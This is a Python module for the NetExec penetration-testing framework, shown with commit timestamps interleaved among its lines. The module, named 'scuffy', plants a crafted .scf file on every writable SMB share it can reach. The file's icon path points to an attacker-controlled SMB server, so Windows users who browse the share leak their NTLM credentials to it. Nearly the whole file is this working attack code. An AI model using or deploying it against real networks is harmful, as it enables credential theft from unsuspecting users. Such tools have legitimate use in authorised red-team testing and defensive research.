2022-07-18 23:59:14 +00:00
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
2017-08-23 08:35:06 +00:00
import ntpath
from sys import exit
2023-03-30 20:36:58 +00:00
2023-09-17 20:20:40 +00:00
class NXCModule :
2023-03-31 15:25:45 +00:00
"""
Original idea and PoC by Mubix " Rob " Fuller
URL : https : / / room362 . com / post / 2016 / smb - http - auth - capture - via - scf /
Module by : @kierangroome
"""
2023-05-02 15:17:59 +00:00
2023-04-04 13:39:54 +00:00
name = " scuffy "
description = " Creates and dumps an arbitrary .scf file with the icon property containing a UNC path to the declared SMB server against all writeable shares "
supported_protocols = [ " smb " ]
2023-05-06 19:15:14 +00:00
opsec_safe = False
2023-04-04 13:39:54 +00:00
multiple_hosts = True
2017-08-23 08:35:06 +00:00
2023-04-04 13:39:54 +00:00
def __init__ ( self , context = None , module_options = None ) :
2023-03-31 15:25:45 +00:00
self . context = context
2023-04-04 13:39:54 +00:00
self . module_options = module_options
2023-03-31 15:25:45 +00:00
self . cleanup = None
self . server = None
self . file_path = None
self . scf_path = None
self . scf_name = None
2017-08-23 08:35:06 +00:00
def options ( self , context , module_options ) :
2023-03-31 15:25:45 +00:00
"""
2017-08-23 08:35:06 +00:00
SERVER IP of the SMB server
NAME SCF file name
CLEANUP Cleanup ( choices : True or False )
2023-03-31 15:25:45 +00:00
"""
2017-08-23 08:35:06 +00:00
self . cleanup = False
2023-05-02 15:17:59 +00:00
if " CLEANUP " in module_options :
self . cleanup = bool ( module_options [ " CLEANUP " ] )
2017-08-23 08:35:06 +00:00
2023-05-02 15:17:59 +00:00
if " NAME " not in module_options :
context . log . fail ( " NAME option is required! " )
2023-03-31 15:25:45 +00:00
exit ( 1 )
2023-05-02 15:17:59 +00:00
if not self . cleanup and " SERVER " not in module_options :
context . log . fail ( " SERVER option is required! " )
2017-08-23 08:35:06 +00:00
exit ( 1 )
2023-03-31 15:25:45 +00:00
2023-05-02 15:17:59 +00:00
self . scf_name = module_options [ " NAME " ]
2023-03-31 15:25:45 +00:00
self . scf_path = f " /tmp/ { self . scf_name } .scf "
2023-05-02 15:17:59 +00:00
self . file_path = ntpath . join ( " \\ " , f " { self . scf_name } .scf " )
2023-03-31 15:25:45 +00:00
2017-08-23 08:35:06 +00:00
if not self . cleanup :
2023-05-02 15:17:59 +00:00
self . server = module_options [ " SERVER " ]
scuf = open ( self . scf_path , " a " )
2023-03-31 15:25:45 +00:00
scuf . write ( f " [Shell] \n " )
scuf . write ( f " Command=2 \n " )
scuf . write ( f " IconFile= \\ \\ { self . server } \\ share \\ icon.ico \n " )
scuf . close ( )
2017-08-23 08:35:06 +00:00
def on_login ( self , context , connection ) :
shares = connection . shares ( )
for share in shares :
2023-05-02 15:17:59 +00:00
if " WRITE " in share [ " access " ] and share [ " name " ] not in [
" C$ " ,
" ADMIN$ " ,
" NETLOGON " ,
] :
2023-03-31 15:25:45 +00:00
context . log . success ( f " Found writable share: { share [ ' name ' ] } " )
2017-08-23 08:35:06 +00:00
if not self . cleanup :
2023-05-02 15:17:59 +00:00
with open ( self . scf_path , " rb " ) as scf :
2017-08-23 08:35:06 +00:00
try :
2023-05-08 18:39:36 +00:00
connection . conn . putFile ( share [ " name " ] , self . file_path , scf . read )
context . log . success ( f " Created SCF file on the { share [ ' name ' ] } share " )
2017-08-23 08:35:06 +00:00
except Exception as e :
2023-05-08 18:39:36 +00:00
context . log . fail ( f " Error writing SCF file to share { share [ ' name ' ] } : { e } " )
2017-08-23 08:35:06 +00:00
else :
try :
2023-05-02 15:17:59 +00:00
connection . conn . deleteFile ( share [ " name " ] , self . file_path )
2023-05-08 18:39:36 +00:00
context . log . success ( f " Deleted SCF file on the { share [ ' name ' ] } share " )
2017-08-23 08:35:06 +00:00
except Exception as e :
2023-05-08 18:39:36 +00:00
context . log . fail ( f " Error deleting SCF file on share { share [ ' name ' ] } : { e } " )